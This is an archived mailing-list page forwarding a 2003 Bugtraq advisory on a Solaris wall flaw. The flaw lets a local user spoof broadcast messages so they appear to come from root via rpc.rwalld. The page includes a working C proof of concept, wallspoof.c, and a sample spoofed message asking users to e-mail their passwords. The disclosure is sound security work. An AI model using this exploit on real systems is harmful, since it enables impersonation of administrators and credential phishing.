Hosting Provided By

FW: Solaris 2.x /usr/sbin/wall Advisory

From: Martin Robson <martin(at)radialsoftware.com>
Date: Fri Jan 03 2003 - 12:21:36 EST

-----Original Message-----
From: Brant Roman [mailto:broman@apollo.gti.net] Sent: Friday, January 03, 2003 8:53 AM
To: bugtraq@securityfocus.com
Subject: Solaris 2.x /usr/sbin/wall Advisory

Affected Operating System(s): Solaris 2.x-9

Possibly others derived from AT&T source code.

Affected Program: /usr/sbin/wall

Synopsis:
Wall is a setgid tty program that broadcasts a message to every user currently logged into the system. It can also receive messages from remote hosts, via RPC (rpc.walld).
The way that wall differentiates between messages sent by local and remote users is by checking if the file descriptor pointed to by stderr corresponds to a tty. If it doesn't, wall checks if the first 5 bytes of the message are "From ". If this is true, the next non-white characters must be in the form of user@host. One can simulate an rpc.walld message by simply closing stderr before executing /usr/sbin/wall and sending a fake "From " header. If this is achieved, it may be possible (by pretending to be an administrator), to fool users into doing things they wouldn't normally do!

Example:

> ./wallspoof root@localhost

Enter your message below. End your message with an EOF (Control+D). We'll be upgrading the system tonight. Everyone needs to e-mail their passwords to suprhakr (he's in charge of security). If you don't do this you won't have an account in the morning. Thanks. <Done> Broadcast Message from root (rpc.rwalld) on localhost Fri Jan 3 09:39:49... From root@localhost:We'll be upgrading the system tonight. Everyone needs to e-mail their passwords to suprhakr (he's in charge of security). If you don't do this you won't have an account in the morning. Thanks.
>

Do you need help?

This is how easily users can be tricked!

I believe this is a serious vulnerability, one which requires an IMMEDIATE patch from Sun. Anyone who runs Solaris is at risk. You have probably already been owned.

Proof of concept:

/*
wallspoof.c - SOLARIS (X86/SPARC) Exploit Don't use this in a malicious way! (i.e. to own people) */

#include 
#include 
#include

int main(int argc, char **argv)
{
  char *userhost;
  char mesg[2050];
  FILE *tmp;
  if (argc < 2) {
    fprintf (stderr, "usage: wallspoof user@host\n");     exit (-1);
  }
  userhost = argv[1];
  if ((tmp = fopen("/tmp/rxax", "w")) == NULL) {     perror ("open");
    exit (-1);
  }
  printf ("Enter your message below. End your message with an EOF (Control+D).\n");
  fprintf (tmp, "From %s:", userhost);
  while (fgets(mesg, 2050, stdin) != NULL)     fprintf (tmp, "%s", mesg);

  fclose (tmp);
  fclose (stderr);
  printf ("\n");
  system ("/usr/sbin/wall < /tmp/rxax");
  unlink ("/tmp/rxax");

}

Martin Robson
CEO / President
Radial Software Development Inc.
Phone / Fax - (604) 692-5971
martin@radialsoftware.com

http://www.radialsoftware.com Received on Sat Jan 4 14:55:22 2003

This message: [ Message body ]
Next message: Ali Ernalbant: "adminlog"
Previous message: Casper Dik: "Re: Crypt Setting"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:01:37 EDT